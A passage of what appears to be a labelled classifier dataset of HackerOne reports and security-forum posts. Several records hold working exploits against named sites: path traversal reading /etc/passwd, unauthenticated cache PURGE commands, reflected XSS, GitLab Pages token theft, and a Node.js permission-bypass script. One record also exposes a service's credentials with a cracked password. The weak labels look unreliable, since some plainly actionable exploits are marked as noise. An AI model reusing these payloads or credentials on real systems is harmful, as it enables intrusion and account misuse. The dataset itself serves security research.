Reference\nhttps://www.cloudflare.com/learning/cdn/glossary/origin-server/\nhttps://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/\nhttps://support.incapsula.com/hc/en-us/articles/211809478-How-do-I-conceal-my-origin-server-IP-\nhttps://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/\n## Similar reports on hackerone\nhttps://hackerone.com/reports/255978\nhttps://hackerone.com/reports/360825\nhttps://hackerone.com/reports/315838\n\n## Impact\n\nAs reported in many other submissions, Cloudflare bypasses can have a significant impact, as any adversary is now able to communicate with the origin server directly, enabling them to perform unfiltered attacks (such as denial-of-service), and data retrieval.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "298ebbecbd4feefd2370", "text": "[Improper Access Control - Generic] Unauthenticated cache purging\n\n## Summary:\nI found a vulnerability in https://fanout.io/ page known as unauthenticated cache purging vulnerability. This vulnerability arises when cache purging requests are available to the unauthenticated users. \n\n## Steps To Reproduce:\n\n 1. Go to any terminal of an OS which has curl installed in it.\n 2. Type in the following command `curl --head https://fanout.io/` and hit enter. You will see that there are these following HTTP headers available\n```http\nvia: 1.1 varnish\nage: 7\nx-served-by: cache-qpg1234-QPG\nx-cache: HIT\nx-cache-hits: 1\n```\n 3. This means that the page is caching the requests. So to reproduce the bug or to exploit it, type `curl -X PURGE https://fanout.io/` and in the response you'll see `{ \"status\": \"ok\", \"id\": \"1237-1678993092-222436\" }` (the id can be changed in your case)\nThis response proves that this endpoint is vulnerable to unauthenticated cache purging.\n\n## Supporting Material/References:\nF2235408\n\n## Impact\n\nIn general, cache purging vulnerabilities can have a high severity level because they can allow an attacker to manipulate the cache of a web application, which can lead to various types of attacks such as website defacement, unauthorized access to sensitive data, or denial of service (DoS) attacks.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cbaca5b60caedcf516e0", "text": "[Cleartext Transmission of Sensitive Information] CVE-2022-43551: Another HSTS bypass via IDN\n\n## Summary:\nI found an issue similar to CVE-2022-42916 again.\nSince the phenomenon is the same, I will describe the same as last time.\n\nHSTS checks are bypassed if any character in the IDN convert(Nameprep) to a '.'\nfor example\"。\"(UTF-8:E38082).\nI think there are other characters that become \".(UTF-8:2E)\" as a result of converting with IDN.\n\nThis is because the host name before IDN conversion is used when writing to the HSTS cache.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Start from a state where there is no entry for the access destination host name in the HSTS cache\n 2. `curl -v --hsts hsts.txt https://accounts.google%E3%80%82com`\n 3. `curl -v --hsts hsts.txt http://accounts.google%E3%80%82com`\n\nResult of 3.\n```\nC:\\test\\curl-7.86.0-win64-mingw\\bin>curl -v --hsts hsts.txt http://accounts.google%E3%80%82com --head\n* Trying 142.250.206.237:80...\n* Connected to accounts.google縲Dom (142.250.206.237) port 80 (#0)\n> HEAD / HTTP/1.1\n> Host: accounts.google.com\n> User-Agent: curl/7.86.0\n> Accept: */*\n>\n```\n\nIf you execute 3. after executing the below, you will access the site with HTTPS.\n`curl -v --hsts hsts.txt https://accounts.google.com`\n\nI use [this](https://curl.se/download/curl-7.86.0.zip) in a Windows environment.\n\nI checked the HSTS cache after executing 2. and found the host name before IDN conversion.\n```\n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\n.accounts.google。com \"20231029 15:57:29\"\n```\n\nI think the problem is in http.c:line 3727.\ndata->state.up.hostname is the hostname of the IDN unconverted.\n```\n CURLcode check =\n Curl_hsts_parse(data->hsts, data->state.up.hostname,\n headp + strlen(\"Strict-Transport-Security:\"));\n```\n\n## Impact\n\nHSTS bypass.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-43551", "CVE-2022-42916"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d7a623c0fe6abddc7619", "text": "[Insecure Storage of Sensitive Information] Exposure Of Admin Username & Password\n\nHello Team, \nTher an exposure of your username and password on this subdomain https://engage2.mtnonline.com/nc/\n\n\nExposed Credentials\n\n uid: \"mtnng\",\n passwd: \"bd31568138edbfc0552a1ecc6886ea5c\",\n\n\n\nSteps To Reproduce:\n\nVisit https://engage2.mtnonline.com/nc/ \n\nNow, press CTRL+U to view the source code of this page,\n\n\nLook for this code\n\n\n\n\n console.log(message);\n }\n}\n\n (function (){\n const plid = 73;\n\n const mtnContainer = document.getElementById(\"mtn20238\");\n const mtnUri = mtnContainer.childNodes[0].getAttribute(\"href\");\n mtnContainer.addEventListener(\"click\", ()=>fetch(mtnUri).catch(()=>{}));\n\n window.mobucksApi.placeAd({\n containerElementId: \"mtn20238\",\n uid: \"mtnng\",\n passwd: \"bd31568138edbfc0552a1ecc6886ea5c\",\n plid:plid,\n }, () => { \n typeof mtnNoBanner == \"function\" && mtnNoBanner(plid,mtnContainer);\n\n## Impact\n\nThe exposed password is in md5 which I was able to decrypt easily\n\nuid: mtnng\nhash = bd31568138edbfc0552a1ecc6886ea\nplain password: v0d@c0mS@\n\nAnd as an attacker, this can be abused in lots of ways such as exposing some client's info\n\nhttps://adsmobucks.mtnbusiness.com.ng/feed?uid=mtnng&passwd=bd31568138edbfc0552a1ecc6886ea5c&plid=8", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "96057dd4a4ef2b787a3b", "text": "First, thank you for having time to read (and even comment!) on my topic today. The whole topic of coding, programming, and cybersecurity has been astronomically increasing in trend over the last couple of years. Here’s the issue, trends are typically and eventually hogged by online revenue makers - aka content creators- leaving all the useful information like a needle in a sh*t load of useless content. Why am I bringing this up? Because I want to share my findings of some sources that were quiet interesting, and I would love if I get recommendations in return!The goal here, and as it was for me 6 months ago, was to be well rounded and informed in the cybersecurity topic. In addition to that, I wanted to learn a computer “language”; thus my choice was Python for different personal reasons!TryHackme : very interesting website, I consider myself fairly informed, and found how these people treat you amazing. They’re literally acting like they have a journey to teach, a stick. Literally!! This really helps them put every little detail you should have known or will be knowing upfront. Starting out with the simplest terms and ideas, and building upon it. With great paths to choose from, and even many rooms and topics to try. Finally they have their own vm for you to experiment with, very interactive!For python, to be honest I’ve been jumping from YouTube videos to browser links, trying to scrape as much useful info as I can on a note sheet. If you have some good resources and recommendations, I would highly appreciate it.Overall, after 6 months between being lost and slowly progressing, I ended up on this forum, still motivated and hungry for help So my advice, watch for the time wasting content, schedule your time and track your progress, good luck!(None of my writings are an ad or any form of marketing)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-04-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b5679a1920e087dac4fc", "text": "I figured it out) Brought it to full screen and saw an icon in the lower right corner. It was not displayed in normal mode.( HTB Academy 277×174 38.6 KB That’s just through pwnbox, the error is the same as on my VM, unfortunately. What am I doing wrong? The advice was to run the script on pwnbox. strangely error_HTB Academy 758×387 143 KB", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-06-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3008a3b701d28e833d36", "text": "[Cross-site Scripting (XSS) - DOM] Self XSS when pasting HTML into Text app with Ctrl+Shift+V\n\n## Summary:\nctrl-shift-v is meant to paste plaintext as is. However it will paste it into a dom elements `innerHtml` and can thus be used to inject malicious html.\n\n## Steps To Reproduce:\n\n 1. copy \"

html

\"\n 1. use ctrl-shift-v to paste it into a .md file\n 1. See the heading getting added.\n\n## Supporting Material/References:\nhttps://github.com/nextcloud/text/blob/main/src/extensions/Markdown.js#L97\n\n * [attachment / reference]\n\n## Impact\n\nIf you can trick someone into using ctrl-shift-v to paste content you control you can insert html into the page leading to a possible xss attack.\n\nThe html will be inserted into the editors schema - but before that happens it's already pasted into the innerHtml of a dom element.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "53fc9202a1cf9725b6af", "text": "[Improper Authorization] Gitlab Pages token theft using service workers\n\n### Summary\nIt is possible to steal Gitlab Pages session tokens by intercepting requests to the `/auth` endpoint on a Pages site using service workers. \n\n### Attack Flow\n**Setup**\n1. The attacker creates a private Gitlab Pages site at the root of their user page `attacker.gitlab.io`, ensuring that the project is `private to collaborators` for Gitlab Pages visibility. \n2. The attacker invites the victim to collaborate to the project, thus giving them access to the private Pages site.\n3. The victim clicks on a link to `attacker.gitlab.io`, and a service worker is registered for the domain, passing through all requests back to the server except the `/auth` endpoint, which it intercepts.\n\n**Bypassing the CSRF protection (OAuth2 `state` param)**\n4. A script on the website requests a valid session cookie and redirection URL from an attacker controlled website.\n5. The attacker controlled website sends its own request to `attacker.gitlab.io`, and retrieves a redirection URL and a session cookie.\n6. A script on the website redirects the victim to the redirection URL retrieved by the attacker, and the user authenticates (since the user is already logged in, this does not require any kind of interaction)\n\n**Intercepting the OAuth2 Response**\n7. The OAuth2 service redirects the user back to `attacker.gitlab.io/auth` with the code and state, which is intercepted by the attacker's service worker and sent to the attacker controlled website.\n8. The attacker controlled website sends a request to the auth endpoint with the original session cookie and the intercepted code and state to obtain an authenticated session cookie.\n9. The attacker can use this cookie to access other GitLab Pages sites that the victim has access to.\n\n### Steps to reproduce\n1. Create an attacker account and victim account. The victim account should have access to a private GitLab Pages site that the attacker does not have access to.\n2. Start the attacker controlled server (ensure that it is on a remote server with HTTPS)\n3. Import the Proof of Concept repository into the attacker's account, rename it to `{attacker username}.gitlab.io` and change the attacker server to the server deployed in step 2.\n4. Invite the victim to collaborate on the `{attacker username}.gitlab.io` project.\n5. While logged into the victim account, visit `{attacker username}.gitlab.io`.\n6. The attacker controlled server will output a valid `gitlab-pages` session cookie, which can be inserted into a browser or curl command (`curl -v --cookie '{cookie}' https://{victim username}.gitlab.io/{private Gitlab Pages project}`) to gain access to the private Gitlab Pages project on the victim's account.\n\n### Examples\n\n**Proof of Concept:**\n\nPages Project export: F1565711\nPages Project on gitlab.com: https://gitlab.com/dotchinavideo/dotchinavideo.gitlab.io\nAttacker controlled server: F1565227 (requires `flask` and `flask-cors` installed, outputs the stolen token to stdout)\n\n### What is the current *bug* behavior?\nThe current behavior is that `gitlab-pages` session cookies are not properly validated to ensure that the requested subdomain is the same as the subdomain to which the session cookie was issued for.\n\n### What is the expected *correct* behavior?\nThe expected behavior is for each `gitlab-pages` session cookie be validated to prevent cross-subdomain usage.\n\n### Relevant logs and/or screenshots\nF1565251\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\nThis bug happens on GitLab.com\n\n## Impact\n\nOnce an attacker has a valid Pages session token, they are able to access every private Gitlab Pages site that the victim has access to.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bab86d9c746604748739", "text": "[Path Traversal] Access to admininstrative resources/account via path traversal\n\n**Description:**\nA user can login as an administrator without the need of an ██████████ account, or an authenticated user can access and manipulate administrative resources without needing to login as an administrator. An ████████ (███████) account is required.\n## References\n\n## Impact\n\nExfiltration of sensitive data (IPs, system configurations, passwords, usernames, email addresses, names), website defacing, denial of service, potential rce, deletion of data.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nIf you do not have an ██████(██████████) account:\n\nNavigate to https://██████/\nLogin using your ████████ account. \nWhen you login you should be at the page https://██████/Saba/██████/CustomLogin.jsp with the error \"There was an error while processing your request. Please try again. If the problem persists, please contact the help desk at ████████\".\nNavigate to https://█████████/home\nYour account name should say \"Samba administrator\"\n\nIf you do have an █████████(███████) account:\n\nNavigate to https://█████/\nLogin using your ███████ account. \nNavigate to a page in the admin directory i.e. https://███████/Saba/Web_wdk/████████/platform/system/admin/systemMain.rdf or https://██████████/Saba/Web_wdk/███████/Platform/system/admin/usersStatistics.rdf\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "baac898fc40a5ccd408a", "text": "[Insecure Direct Object Reference (IDOR)] IDOR - send a message on behalf of other user\n\nHi there, \n\n\nI just found an IDOR in https://hello.dev.myhubs.net/. It allow attacker send a message on behalf of other user \n\nStep to reproduce:\n\t- 1. Admin: Create Room \n\t- 2. Attacker: Join room\n\t- 3. Attacker get \"session_id\" of other user in response \"presence_diff\"\n\n\t\t{F2200381}\n\t- 4. Attacker send add \"session_id\" parameter to request send message \n\t\t```\n\t\t[\"8\",null,\"hub:84fbckn\",\"message\",{\"session_id\":\"\",\"body\":\"eeeee\",\"type\":\"chat\"}]\n\t\t```\n\t\t{F2200382}\n\t- Now the message will be send on behalf of victim \n\nPOC: \n{F2200384}\n\n## Impact\n\nIt allow attacker send a message on behalf of other user", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ccf2ccab397b09e3a355", "text": "I am gonna help you because I received many helps here too. To get the correct results from ffuf, you need to ensure that the IP address after -u contains a http in front (eg http://1.1.1.1 ). In addition, the -H parameter will need to have NO http in front (eg: Host: FUZZ.example.com ). Also remove all your hosts entry related to HTB from /etc/hosts, if any. Should be working after this. Btw your flag 1 is incorrect. You will know once you get the results from ffuf.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-08-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "31ec00bb4f907cdc00c6", "text": "For those who have been like me and have been stuck on this question for ages, not being able to get the correct password list to use here are some clues, hopefully these are helpful: The brute forcing should not take long at all You only need to input the characters first name into the password generator (cupp) Try ticking the option to using special characters at the end of words Use Leet mode Dont forget to filter the password list for passwords that match the password policy Hopefully this help", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1dc80b191bdd423d4fe6", "text": "[Improper Access Control - Generic] [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserTfaEnforcement\n\n## Summary:\nThere is an access control issue that happens when a Shopify Plus user tries to update the 2FA requirement of a user in another organisation. While the response shows an error message, an email is sent to the user with the 2FA status, first name, last name, email address, and shop id from the victim.\n\n## Steps To Reproduce:\n1. Log in to your Shopify Plus account https://shopify.plus/login\n2. Go to `Administration` -> `Users` then go in one of the user page\n3. In the `Security` section, edit the 2FA setting\n\n {F1168658}\n4. Notice the following request:\n ```http\nPOST /34808573/users/api HTTP/1.1\nHost: shopify.plus\n [...]\n\n {\n \"operationName\": \"UpdateOrganizationUserTfaEnforcement\",\n \"variables\": {\n \"id\": \"Z2lkOi8vb3JnYW5pemF0aW9uL09yZ2FuaXphdGlvblVzZXIvMzQwNTc5Mzg=\",\n \"enforced\": false\n },\n \"query\": \"mutation UpdateOrganizationUserTfaEnforcement($id: OrganizationUserID!, $enforced: Boolean!) {\\n updateOrganizationUserTfaEnforcement(id: $id, enforced: $enforced) {\\n organizationUser {\\n id\\n tfaEnforced\\n __typename\\n }\\n userErrors {\\n field\\n message\\n __typename\\n }\\n operationStatus\\n message\\n __typename\\n }\\n}\\n\"\n }\n```\n5. In Burp Repeater, edit the `id` with `Z2lkOi8vb3JnYW5pemF0aW9uL09yZ2FuaXphdGlvblVzZXIvMzQwNzE2MzI=`\n6. You will receive an email containing Anatoly information :\n{F1168661}\n\n## Impact\n\nA Shopify Plus user can retrieve information (2FA status, first name, last name, email address, shop ip) from a user in another organisation.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f916286e252e1f7a2609", "text": "Debug, and debug again, what is the value of the rdx register before the xor? Sorry but I’m a bit confused. xor [rdx], rbx should not alter the value in rbx but directly write the xor-ed value back to the stack. Also, I tried directly yielding the control flow to the decoded shellcode by enabling stack execution when linking the binary with ld -z execstack . Unfortunately, the decoded shellcode contains plenty of register-based memory access, which leads to segfaults as most of the registers are initialized with value 0.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "42a5c2d9417352f9cb42", "text": "wow! great. i would like to learn more about how you are controlling the drone via keyboard. its been almost 2 years i’ve stoped working on this.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9d0de258f528fd5787ac", "text": "[Path Traversal] [doc.rt.informaticacloud.com] Arbitrary File Reading via Double URL Encode\n\nHi. Attacker can read arbitrary file in system via next query:\n\n```\nhttp://doc.rt.informaticacloud.com/infocenter/ActiveVOS/v92/topic/com.activee.bpep.doc/images/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd\n```\n\nYou can see the response here: \n{F188500}\n\n```\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nsyslog:x:101:103::/home/syslog:/bin/false\nmessagebus:x:102:105::/var/run/dbus:/bin/false\nlandscape:x:103:108::/var/lib/landscape:/bin/false\nsshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin\nubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash\npuppet:x:105:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false\nvrangan:x:1001:1001::/home/vrangan:/bin/bash\navahi:x:106:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\n```", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "385f31fb0b33f42553ff", "text": "[Insecure Storage of Sensitive Information] All user password hash can be seen from admin panel\n\n# Summary:\nDuring my primary research I found that `api/users?page=1&userId=&firstName=test&lastName=&email=&partnerOrg=&highSchool=` this endpoint gives hashed password of all users.\n\n# Steps To Reproduce:\n+ Login to Admin and go to Admin--> Search Users.\n+ We see a request like this was send and in response we get the hashed password of all the users.\n\n{F1630381}\n\n##HTTP Request:\n\n```\nGET /api/users?page=1&userId=&firstName=test&lastName=&email=&partnerOrg=&highSchool= HTTP/2\nHost: hackers.upchieve.org\nCookie: connect.sid=s%3AaF9AzSGty6cZOHNTyahImdIzUoSDCWuB.ofJzU1Tr25W2Kd2unMFlpS66K4VsPtK3YE0xmHvUZGU; _gcl_au=1.1.2044852401.1644683211; _ga=GA1.2.1811282066.1644683221; _csrf=whFQZop0bR6xQh6KtmNQLBfS; __cf_bm=2KDOr5.OqRrhRkG3HhcUs0vp57z5O6ajxpDfiZBVfGA-1645624338-0-AU9Yc7GzGOeS+GILwGKIEWzbToj/4SEhBw5wog9uHW0rWkomQxhuC756xXzHVx5vQZWpm8qGUUNBPxFB6cvtTQ9BfzCJWA5Zq9jDYP3Z9p+Olw+qCSjBa/rjulVDF51Kjg==; io=zIQg9SCEJ_ZblHVdAAAy; _gid=GA1.2.1980510602.1645624337; ph_bogus_posthog=%7B%22distinct_id%22%3A%22619ea2c8488636001138121f%22%2C%22%24device_id%22%3A%2217eeec24dba290-06a553129ffb21-4c3e227d-1fa400-17eeec24dbb903%22%2C%22%24user_id%22%3A%22619ea2c8488636001138121f%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22%24referrer%22%3A%22%24direct%22%2C%22%24referring_domain%22%3A%22%24direct%22%2C%22%24session_recording_enabled%22%3Afalse%7D\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nNewrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjI2NzQ5NzQiLCJhcCI6IjQyOTE2Mzc1MCIsImlkIjoiNzFhMzgxOGNjZDQ2OGNkYyIsInRyIjoiYjBiM2Q0YTI3N2NjZDZmODBmOWU2NWIwODBlY2U1NDAiLCJ0aSI6MTY0NTYyNTExMDY0N319\nTraceparent: 00-b0b3d4a277ccd6f80f9e65b080ece540-71a3818ccd468cdc-01\nTracestate: 2674974@nr=0-1-2674974-429163750-71a3818ccd468cdc----1645625110647\nX-Csrf-Token: KeypPQND-ch0LQMIPkTckMoZdYHTBgA4Mha0\nX-Requested-With: XMLHttpRequest\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n```\n\n## Impact\n\nChances that weak passwords can be cracked and people might have same passwords for email and other places.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c808f881031888562156", "text": "[Improper Access Control - Generic] Cache purge requests are not authenticated\n\n## Summary:\nAnyone can issue a PURGE request for any resource and invalidate your caches. That can lead to increased bandwidth costs but also potential Denial of Service attacks.\n\n## Steps To Reproduce:\n\n 1. Fetching the resource headers, we can see in the X-Cache that the resource was a HIT with X-Cache-Hits: 5:\nPut the below command in the terminal (this is request):\n# curl -s -D - https://fanout.io -o /dev/null\nHTTP/2 200\nserver: nginx/1.14.0 (Ubuntu)\ncontent-type: text/html; charset=utf-8\nx-frame-options: DENY\nx-content-type-options: nosniff\naccept-ranges: bytes\ndate: Wed, 12 Apr 2023 00:05:08 GMT\nvia: 1.1 varnish\nage: 1215\nx-served-by: cache-maa10224-MAA\nx-cache: HIT\nx-cache-hits: 5\nx-timer: S1681257908.308066,VS0,VE0\nvary: Cookie\ncontent-length: 20567\n\n 2. Then put the below command to purge the cache as an unauthenticated user. And see the result, Status is OK means it successfully deletes the cache without authentication.\n# curl -X PURGE https://fanout.io\n{ \"status\": \"ok\", \"id\": \"10234-1680248948-114138\" }\n\n 3. Now again fire the first command to see the x-cache-hits. See, the x-cache-hits is 1 now.\n# curl -s -D - https://fanout.io -o /dev/null\nHTTP/2 200\nserver: nginx/1.14.0 (Ubuntu)\ncontent-type: text/html; charset=utf-8\nx-frame-options: DENY\nx-content-type-options: nosniff\naccept-ranges: bytes\ndate: Wed, 12 Apr 2023 00:06:01 GMT\nvia: 1.1 varnish\nage: 8\nx-served-by: cache-maa10233-MAA\nx-cache: HIT\nx-cache-hits: 1\nx-timer: S1681257962.998849,VS0,VE1\nvary: Cookie\ncontent-length: 20567\n\n\n## Supporting Material/References:\nHere is attached screenshots.\n\n 1. {F2287583}\n2. {F2287584}\n3. {F2287585}\n\n Also I am putting a reference report link here.\nhttps://hackerone.com/reports/154278\n\n## Impact\n\nThis can lead to increased bandwidth costs and degraded application performance. Allowing anonymous users to purge cache could be used to maliciously degrade performance.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bd76647137d629adf6b1", "text": "I was just about to make a new post regarding this question but figured it out as I was making the post - After multiple attempts, I wasn’t able to enumerate the page name with the -e switch, even with the correct extension listed. Haven’t figured out why yet. Nonetheless, by manually performing the fuzz on the appropriate resource, I was able to see the page they were referring to. However, this started my biggest challenge, which was entering the answer as they preferred it. AttackingWebApplicationswithFfuf 765×178 30 KB After a successful curl and receiving the described text, I copy/pasted the URL into the answer section only to be met with an incorrect response. Thinking there may be another page, my pursuit continued. Hours later, I clicked on the HINT and realized the format they wanted it in. Argh!!!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7383dbab97836d346507", "text": "[Cross-site Scripting (XSS) - Reflected] POST BASED REFLECTED XSS IN dailydeals.mtn.co.za\n\n## Summary:\nDear Team ,\nI have found a post based reflected XSS in https://dailydeals.mtn.co.za/ .\n\n## Steps To Reproduce:\n\n1.Create a html file with following content .\n\n
\">
\n \n
\n \n \n \n \n \n \n \n
\n \n \n\n\n```\n\n## Suggested Mitigation/Remediation Actions\nFilter input on arrival\nEncode data on output\nUse appropriate response headers\nContent Security Policy.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c84680a94df25398232c", "text": "[Improper Access Control - Generic] Process-based permissions can be bypassed with the \"inspector\" module.\n\n**Summary:**\n\nRestrictions made with with the --experimental-permission flag can by bypassed with the built-in inspector module. \n\n**Description:** \n\nThe Worker class can take an argument (the kIsInternal Symbol) to create an \"internal worker\" which does not respect the process level restrictions. \n\nWe cant access this Symbol('kIsInternal'); directly, however the [inspector module](https://nodejs.org/api/inspector.html) is not disabled when process level restrictions are in place. \"The node:inspector module provides an API for interacting with the V8 inspector.\"\n\nIf we attach inspector inside the Worker constructor before `new WorkerImpl` is created we can simply change the value of \"isInternal\". \n\n## Steps To Reproduce:\n\n1. Create the following `bypass.js` file: \n\n```javascript\nconst { Session } = require('node:inspector/promises');\n\nconst session = new Session();\nsession.connect();\n\n(async ()=>{\n\tawait session.post('Debugger.enable');\n\tawait session.post('Runtime.enable');\n\n\tglobal.Worker = require('node:worker_threads').Worker;\n\t\n\tlet {result:{ objectId }} = await session.post('Runtime.evaluate', { expression: 'Worker' });\n\tlet { internalProperties } = await session.post(\"Runtime.getProperties\", { objectId: objectId });\n\tlet {value:{value:{ scriptId }}} = internalProperties.filter(prop => prop.name == '[[FunctionLocation]]')[0];\n\tlet { scriptSource } = await session.post(\"Debugger.getScriptSource\", { scriptId });\n\n\t// find the line number where WorkerImpl is called. \n\tconst lineNumber = scriptSource.substring(0, scriptSource.indexOf(\"new WorkerImpl\")).split('\\n').length;\n\n\t// WorkerImpl will bypass permission for internal modules. We can inject the local var \"isInternal = true\" with a conditional breakpoint.\n\tawait session.post(\"Debugger.setBreakpointByUrl\", {\n\t\tlineNumber: lineNumber,\n\t\turl: \"node:internal/worker\",\n\t\tcolumnNumber: 0,\n\t\tcondition: \"((isInternal = true),false)\"\n\t});\n\n\tnew Worker(`\n\t\tconst child_process = require(\"node:child_process\");\n\t\tconsole.log(child_process.execSync(\"ls -l\").toString());\n\t\t\n\t\tconsole.log(require(\"fs\").readFileSync(\"/etc/passwd\").toString())\n\t`, {\n\t\teval: true,\n\t\texecArgv: [\n\t\t\t\"--experimental-permission\",\n\t\t\t\"--allow-fs-read=*\",\n\t\t\t\"--allow-fs-write=*\",\n\t\t\t\"--allow-child-process\",\n\t\t\t\"--no-warnings\"\n\t\t]\n\t});\n\n})()\n```\n\n2. Run the following command :\n\n``` bash\nnode --experimental-permission --allow-fs-read=$(pwd) bypass.js\n```\n---\nIf the policies were not bypassed we would expect to see something like: \n\n```\nnode --experimental-permission --allow-fs-read=$(pwd) safe.js\nnode:internal/child_process:1103\n const result = spawn_sync.spawn(options);\n ^\n\nError: Access to this API has been restricted\n``` \n\n## Supporting Material/References:\nIn my opinion inspector should be allowed when process level permissions are being enforced. \nI noticed there was already a flag: EnvironmentFlags::kNoCreateInspector. I took a shot at patching this out unless ==inspect or --inspect-brk were used, but I didn't know if a more direct options like \"--allow-inspector\" would be preferred. \n\n ``` diff\ndiff --git a/src/env.cc b/src/env.cc\nindex 571a8ed5ce..b5b7557bd1 100644\n--- a/src/env.cc\n+++ 